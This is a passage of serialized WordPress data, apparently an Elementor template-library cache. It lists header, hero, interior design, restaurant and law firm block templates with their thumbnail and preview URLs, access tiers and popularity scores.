7\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2018/03/header350.6.jpg\";s:12:\"tmpl_created\";i:1524583712;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:114:\"https://library.elementor.com/blocks/header-7/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"header\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:375;s:16:\"popularity_index\";i:111;s:11:\"trend_index\";i:143;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:611;a:20:{s:4:\"tmpl\";i:661;s:2:\"id\";i:7771;s:5:\"title\";s:8:\"header 8\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2018/03/header350.7.jpg\";s:12:\"tmpl_created\";i:1524583540;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:114:\"https://library.elementor.com/blocks/header-8/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"header\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:376;s:16:\"popularity_index\";i:91;s:11:\"trend_index\";i:60;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:612;a:20:{s:4:\"tmpl\";i:662;s:2:\"id\";i:7787;s:5:\"title\";s:8:\"header 9\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2018/03/header350.8.jpg\";s:12:\"tmpl_created\";i:1524583598;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:114:\"https://library.elementor.com/blocks/header-9/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"header\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:379;s:16:\"popularity_index\";i:102;s:11:\"trend_index\";i:78;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:613;a:20:{s:4:\"tmpl\";i:572;s:2:\"id\";i:6266;s:5:\"title\";s:6:\"Hero 1\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/03/heroo_black_4.png\";s:12:\"tmpl_created\";i:1520443695;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:112:\"https://library.elementor.com/blocks/hero-1/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:4:\"hero\";s:4:\"tags\";s:8:\"[\"hero\"]\";s:10:\"menu_order\";i:380;s:16:\"popularity_index\";i:52;s:11:\"trend_index\";i:35;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:614;a:20:{s:4:\"tmpl\";i:528;s:2:\"id\";i:5783;s:5:\"title\";s:7:\"Hero 10\";s:9:\"thumbnail\";s:69:\"https://library.elementor.com/wp-content/uploads/2018/03/header_2.png\";s:12:\"tmpl_created\";i:1520443586;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:113:\"https://library.elementor.com/blocks/hero-10/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"hero\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:383;s:16:\"popularity_index\";i:365;s:11:\"trend_index\";i:567;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:615;a:20:{s:4:\"tmpl\";i:527;s:2:\"id\";i:5773;s:5:\"title\";s:7:\"Hero 11\";s:9:\"thumbnail\";s:69:\"https://library.elementor.com/wp-content/uploads/2018/03/header_1.png\";s:12:\"tmpl_created\";i:1520443584;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:113:\"https://library.elementor.com/blocks/hero-11/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:4:\"hero\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:384;s:16:\"popularity_index\";i:39;s:11:\"trend_index\";i:179;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:616;a:20:{s:4:\"tmpl\";i:479;s:2:\"id\";i:5238;s:5:\"title\";s:7:\"Hero 12\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2018/03/form_white_4.png\";s:12:\"tmpl_created\";i:1520443468;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:113:\"https://library.elementor.com/blocks/hero-12/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"hero\";s:4:\"tags\";s:8:\"[\"hero\"]\";s:10:\"menu_order\";i:386;s:16:\"popularity_index\";i:611;s:11:\"trend_index\";i:555;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:617;a:20:{s:4:\"tmpl\";i:573;s:2:\"id\";i:6274;s:5:\"title\";s:6:\"Hero 2\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/03/heroo_black_5.png\";s:12:\"tmpl_created\";i:1520443698;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:112:\"https://library.elementor.com/blocks/hero-2/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"hero\";s:4:\"tags\";s:8:\"[\"hero\"]\";s:10:\"menu_order\";i:389;s:16:\"popularity_index\";i:87;s:11:\"trend_index\";i:88;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:618;a:20:{s:4:\"tmpl\";i:569;s:2:\"id\";i:6239;s:5:\"title\";s:6:\"Hero 3\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/03/heroo_black_1.png\";s:12:\"tmpl_created\";i:1520443689;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:112:\"https://library.elementor.com/blocks/hero-3/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:4:\"hero\";s:4:\"tags\";s:8:\"[\"hero\"]\";s:10:\"menu_order\";i:391;s:16:\"popularity_index\";i:23;s:11:\"trend_index\";i:34;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:619;a:20:{s:4:\"tmpl\";i:571;s:2:\"id\";i:6258;s:5:\"title\";s:6:\"Hero 4\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/03/heroo_black_3.png\";s:12:\"tmpl_created\";i:1520443693;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:112:\"https://library.elementor.com/blocks/hero-4/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"hero\";s:4:\"tags\";s:8:\"[\"hero\"]\";s:10:\"menu_order\";i:393;s:16:\"popularity_index\";i:479;s:11:\"trend_index\";i:470;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:620;a:20:{s:4:\"tmpl\";i:570;s:2:\"id\";i:6249;s:5:\"title\";s:6:\"Hero 5\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/03/heroo_black_2.png\";s:12:\"tmpl_created\";i:1520443691;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:112:\"https://library.elementor.com/blocks/hero-5/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:4:\"hero\";s:4:\"tags\";s:8:\"[\"hero\"]\";s:10:\"menu_order\";i:395;s:16:\"popularity_index\";i:56;s:11:\"trend_index\";i:85;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:621;a:20:{s:4:\"tmpl\";i:568;s:2:\"id\";i:6230;s:5:\"title\";s:6:\"Hero 6\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/03/heroo_white_1.png\";s:12:\"tmpl_created\";i:1520443687;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:112:\"https://library.elementor.com/blocks/hero-6/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"hero\";s:4:\"tags\";s:8:\"[\"hero\"]\";s:10:\"menu_order\";i:396;s:16:\"popularity_index\";i:406;s:11:\"trend_index\";i:542;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:622;a:20:{s:4:\"tmpl\";i:530;s:2:\"id\";i:5801;s:5:\"title\";s:6:\"Hero 7\";s:9:\"thumbnail\";s:69:\"https://library.elementor.com/wp-content/uploads/2018/03/header_4.png\";s:12:\"tmpl_created\";i:1520443589;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:112:\"https://library.elementor.com/blocks/hero-7/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:4:\"hero\";s:4:\"tags\";s:8:\"[\"hero\"]\";s:10:\"menu_order\";i:398;s:16:\"popularity_index\";i:15;s:11:\"trend_index\";i:37;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:623;a:20:{s:4:\"tmpl\";i:531;s:2:\"id\";i:5811;s:5:\"title\";s:6:\"Hero 8\";s:9:\"thumbnail\";s:69:\"https://library.elementor.com/wp-content/uploads/2018/03/header_5.png\";s:12:\"tmpl_created\";i:1520443591;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:112:\"https://library.elementor.com/blocks/hero-8/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:4:\"hero\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:400;s:16:\"popularity_index\";i:105;s:11:\"trend_index\";i:86;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:624;a:20:{s:4:\"tmpl\";i:529;s:2:\"id\";i:5792;s:5:\"title\";s:6:\"Hero 9\";s:9:\"thumbnail\";s:69:\"https://library.elementor.com/wp-content/uploads/2018/03/header_3.png\";s:12:\"tmpl_created\";i:1520443588;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:112:\"https://library.elementor.com/blocks/hero-9/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"hero\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:403;s:16:\"popularity_index\";i:225;s:11:\"trend_index\";i:244;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:625;a:20:{s:4:\"tmpl\";i:978;s:2:\"id\";i:13251;s:5:\"title\";s:27:\"Interior Design &#8211; 404\";s:9:\"thumbnail\";s:64:\"https://library.elementor.com/wp-content/uploads/2020/04/404.png\";s:12:\"tmpl_created\";i:1586148737;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:125:\"https://library.elementor.com/blocks/interior-design-404/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"404 page\";s:4:\"tags\";s:30:\"[\"Business\",\"Interior Design\"]\";s:10:\"menu_order\";i:405;s:16:\"popularity_index\";i:730;s:11:\"trend_index\";i:795;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:626;a:20:{s:4:\"tmpl\";i:979;s:2:\"id\";i:13244;s:5:\"title\";s:30:\"Interior Design &#8211; Footer\";s:9:\"thumbnail\";s:67:\"https://library.elementor.com/wp-content/uploads/2020/04/Footer.png\";s:12:\"tmpl_created\";i:1586148742;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:128:\"https://library.elementor.com/blocks/interior-design-footer/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"footer\";s:4:\"tags\";s:39:\"[\"Business\",\"Footer\",\"Interior Design\"]\";s:10:\"menu_order\";i:406;s:16:\"popularity_index\";i:322;s:11:\"trend_index\";i:178;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:627;a:20:{s:4:\"tmpl\";i:980;s:2:\"id\";i:13236;s:5:\"title\";s:30:\"Interior Design &#8211; Header\";s:9:\"thumbnail\";s:83:\"https://library.elementor.com/wp-content/uploads/2020/06/Header-interior-design.png\";s:12:\"tmpl_created\";i:1586148746;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:128:\"https://library.elementor.com/blocks/interior-design-header/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"header\";s:4:\"tags\";s:39:\"[\"Business\",\"Header\",\"Interior Design\"]\";s:10:\"menu_order\";i:408;s:16:\"popularity_index\";i:146;s:11:\"trend_index\";i:64;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:628;a:20:{s:4:\"tmpl\";i:977;s:2:\"id\";i:13259;s:5:\"title\";s:36:\"Interior Design &#8211; News Archive\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2020/04/Archiv-Blog.png\";s:12:\"tmpl_created\";i:1586148733;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:134:\"https://library.elementor.com/blocks/interior-design-news-archive/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"archive\";s:4:\"tags\";s:30:\"[\"Business\",\"Interior Design\"]\";s:10:\"menu_order\";i:410;s:16:\"popularity_index\";i:436;s:11:\"trend_index\";i:132;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:629;a:20:{s:4:\"tmpl\";i:976;s:2:\"id\";i:13267;s:5:\"title\";s:35:\"Interior Design &#8211; Single News\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2020/04/Post.png\";s:12:\"tmpl_created\";i:1586148728;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:133:\"https://library.elementor.com/blocks/interior-design-single-news/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"single post\";s:4:\"tags\";s:30:\"[\"Business\",\"Interior Design\"]\";s:10:\"menu_order\";i:413;s:16:\"popularity_index\";i:402;s:11:\"trend_index\";i:108;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:630;a:20:{s:4:\"tmpl\";i:975;s:2:\"id\";i:13274;s:5:\"title\";s:38:\"Interior Design &#8211; Single Project\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2020/04/Single-Project-.png\";s:12:\"tmpl_created\";i:1586148723;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:136:\"https://library.elementor.com/blocks/interior-design-single-project/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"single post\";s:4:\"tags\";s:30:\"[\"Business\",\"Interior Design\"]\";s:10:\"menu_order\";i:414;s:16:\"popularity_index\";i:601;s:11:\"trend_index\";i:324;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:631;a:20:{s:4:\"tmpl\";i:1011;s:2:\"id\";i:14058;s:5:\"title\";s:36:\"Japanese restaurant &#8211; 404 page\";s:9:\"thumbnail\";s:69:\"https://library.elementor.com/wp-content/uploads/2020/06/404-Page.jpg\";s:12:\"tmpl_created\";i:1592290211;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:134:\"https://library.elementor.com/blocks/japanese-restaurant-404-page/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"404 page\";s:4:\"tags\";s:38:\"[\"404\",\"Food\",\"Japanese\",\"Restaurant\"]\";s:10:\"menu_order\";i:416;s:16:\"popularity_index\";i:724;s:11:\"trend_index\";i:647;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:632;a:20:{s:4:\"tmpl\";i:1012;s:2:\"id\";i:14050;s:5:\"title\";s:34:\"Japanese restaurant &#8211; Footer\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2020/06/Footer-Small.jpg\";s:12:\"tmpl_created\";i:1592290247;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:132:\"https://library.elementor.com/blocks/japanese-restaurant-footer/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"footer\";s:4:\"tags\";s:41:\"[\"Food\",\"Footer\",\"Japanese\",\"Restaurant\"]\";s:10:\"menu_order\";i:419;s:16:\"popularity_index\";i:317;s:11:\"trend_index\";i:238;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:633;a:20:{s:4:\"tmpl\";i:1013;s:2:\"id\";i:14042;s:5:\"title\";s:34:\"Japanese Restaurant &#8211; Header\";s:9:\"thumbnail\";s:87:\"https://library.elementor.com/wp-content/uploads/2020/06/japanese-restaurant-header.jpg\";s:12:\"tmpl_created\";i:1592290277;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:132:\"https://library.elementor.com/blocks/japanese-restaurant-header/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"header\";s:4:\"tags\";s:41:\"[\"Food\",\"Header\",\"Japanese\",\"Restaurant\"]\";s:10:\"menu_order\";i:421;s:16:\"popularity_index\";i:411;s:11:\"trend_index\";i:274;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:634;a:20:{s:4:\"tmpl\";i:914;s:2:\"id\";i:12164;s:5:\"title\";s:20:\"Law Firm &#8211; 404\";s:9:\"thumbnail\";s:64:\"https://library.elementor.com/wp-content/uploads/2019/11/404.png\";s:12:\"tmpl_created\";i:1572846979;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:118:\"https://library.elementor.com/blocks/law-firm-404/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"404 page\";s:4:\"tags\";s:24:\"[\"404\",\"Law\",\"Law Firm\"]\";s:10:\"menu_order\";i:422;s:16:\"popularity_index\";i:704;s:11:\"trend_index\";i:716;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:635;a:20:{s:4:\"tmpl\";i:913;s:2:\"id\";i:12170;s:5:\"title\";s:23:\"Law Firm &#8211; Archiv\";s:9:\"thumbnail\";s:67:\"https://library.elementor.com/wp-content/uploads/2019/11/archiv.png\";s:12:\"tmpl_created\";i:1572846967;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:121:\"https://library.elementor.com/blocks/law-firm-archiv/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"archive\";s:4:\"tags\";s:18:\"[\"Law\",\"Law Firm\"]\";s:10:\"menu_order\";i:424;s:16:\"popularity_index\";i:431;s:11:\"trend_index\";i:294;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:636;a:20:{s:4:\"tmpl\";i:912;s:2:\"id\";i:12179;s:5:\"title\";s:23:\"Law Firm &#8211; Footer\";s:9:\"thumbnail\";s:67:\"https://library.elementor.com/wp-content/uploads/2019/11/footer.png\";s:12:\"tmpl_created\";i:1572846958;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:121:\"https://library.elementor.com/blocks/law-firm-footer/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"footer\";s:4:\"tags\";s:27:\"[\"Footer\",\"Law\",\"Law Firm\"]\";s:10:\"menu_order\";i:425;s:16:\"popularity_index\";i:388;s:11:\"trend_index\";i:240;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:637;a:20:{s:4:\"tmpl\";i:911;s:2:\"id\";i:12194;s:5:\"title\";s:23:\"Law Firm &#8211; Header\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2020/06/Header-law-firm.png\";s:12:\"tmpl_created\";i:1572846935;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:121:\"https://library.elementor.com/blocks/law-firm-header/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"header\";s:4:\"tags\";s:27:\"[\"Header\",\"Law\",\"Law Firm\"]\";s:10:\"menu_order\";i:427;s:16:\"popularity_index\";i:80;s:11:\"trend_index\";i:39;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:638;a:20:{s:4:\"tmpl\";i:910;s:2:\"id\";i:12203;s:5:\"title\";s:30:\"Law Firm &#8211; Search Archiv\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2019/11/search_result.png\";s:12:\"tmpl_created\";i:1572846925;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:128:\"https://library.elementor.com/blocks/law-firm-search-archiv/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"archive\";s:4:\"tags\";s:18:\"[\"Law\",\"Law Firm\"]\";s:10:\"menu_order\";i:430;s:16:\"popularity_index\";i:493;s:11:\"trend_index\";i:433;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:639;a:20:{s:4:\"tmpl\";i:909;s:2:\"id\";i:12212;s:5:\"title\";s:28:\"Law Firm &#8211; Single Post\";s:9:\"thumbnail\";s:67:\"https://library.elementor.com/wp-content/uploads/2019/11/single.png\";s:12:\"tmpl_created\";i:1572846914;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:126:\"https://library.elementor.com/blocks/law-firm-single-post/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"single post\";s:4:\"tags\";s:18:\"[\"Law\",\"Law Firm\"]\";s:10:\"menu_order\";i:432;s:16:\"popularity_index\";i:326;s:11:\"trend_index\";i:214;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:640;a:20:{s:4:\"tmpl\";i:1022;s:2:\"id\";i:14772;s:5:\"title\";s:35:\"Luxury Real Estate &#8211; 404 